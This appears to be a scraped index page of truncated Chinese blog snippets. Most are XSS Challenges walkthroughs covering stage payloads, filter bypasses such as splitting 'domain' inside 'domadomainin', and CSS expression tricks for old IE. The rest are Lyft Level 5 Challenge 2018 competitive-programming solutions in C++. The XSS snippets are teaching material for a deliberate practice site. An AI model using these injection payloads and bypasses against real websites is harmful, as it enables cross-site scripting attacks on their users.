challenge 8: js伪协议的应用,请使用ie浏览器 输入如下javascript:alert(document.domain); challenge 9 : 提示要用utf-7 xss来做,不过我是没做出来. challenge 10: 这次发现过滤了domain,可以如下构造" onmouseover=alert(document.domadomainin);  这样过滤掉domain后会构成新的domain challenge 11 "><a href=&qu

XSS Challenge(2)

XSS Challenges http://xss-quiz.int21h.jp/ Stage #13 Hint:style attribute:要用到style属性,在style属性中有个expression属性可以来完成,但是只能是IE6以下的浏览器才支持: 将浏览器切换到IE5兼容模式,然后输入payload Stage #14 Hint:对url.script.eval.expression做了过滤,将这些单词转换成xxx,我们无法通过大小写.双写绕过,但是可以用注释绕过: Stage

xss challenge 解题思路(4-7)

challenge 4: 这一关输入依然是过滤的,而且后面的下拉菜单都过滤了,但是我们发现,源码里有name=p3的东西,他的内容提交后不变,so,将value值变为  "</input><script>alert(document.domain)</script><input>"  提交后成功. challenge 5: 这一关是没有过滤的,但是文本框有maxlength,从原代码中果断删掉.然后构造"</input&g

Lyft Level 5 Challenge 2018 - Final Round (Open Div. 2) B 1075B (思维)

B. Taxi drivers and Lyft time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output Palo Alto is an unusual city because it is an endless coordinate line. It is also known for the office of Lyft Level

Lyft Level 5 Challenge 2018 - Final Round (Open Div. 2)

A. The King's Race 签. 1 #include <bits/stdc++.h> 2 using namespace std; 3 4 #define ll long long 5 ll n, x, y; 6 7 ll f(ll a, ll b) 8 { 9 return max(abs(a - x), abs(b - y)); 10 } 11 12 int main() 13 { 14 while (scanf("%lld%lld%lld", &n

Lyft Level 5 Challenge 2018 - Elimination Round

A. King Escape 签. 1 #include <bits/stdc++.h> 2 using namespace std; 3 4 int n, x[3], y[3]; 5 6 int f1(int X, int Y) 7 { 8 return X - Y - x[2] + y[2]; 9 } 10 11 int f2(int X, int Y) 12 { 13 return x[2] + y[2] - X - Y; 14 } 15 16 bool ok() 17 { 18 //i

XSS Challenge(1)

XSS Challenges http://xss-quiz.int21h.jp/ Stage #1 注入alert(document.domain),先试一试输入后会返回什么: 返回在标签中,直接尝试输入payload: Stage #2 测试一下返回: 可以发现,test返回在value属性里,注意闭合value属性的双引号即可: Stage #3 测试一下返回情况: 通过观察源码我们可以发现一共POST了两个参数,p1和p2,通过测试发现p1被过滤了,于是用burp修改p2的值: Stag

xss challenge 解题思路(1-3)

challenge1: 用很基本的方法即可,截图如下: 提交后成功弹窗,完成. challenge2 这次我们发现我们输入的内容被放入value=”“ 中,所以需要将前面的结构闭合,构造如下: "><script>alert(document.domain)</script>" OK,成功了,那么下一道. challenge3 先来试一下,构造"</b><script>alert(document.domain)</

Lyft Level 5 Challenge 2018 - Elimination Round翻车记

打猝死场感觉非常作死. A:判一下起点和终点是否在其两侧即可. #include<iostream> #include<cstdio> #include<cmath> #include<cstdlib> #include<cstring> #include<algorithm> using namespace std; int read() { int x=0,f=1;char c=getchar(); while (c<'0'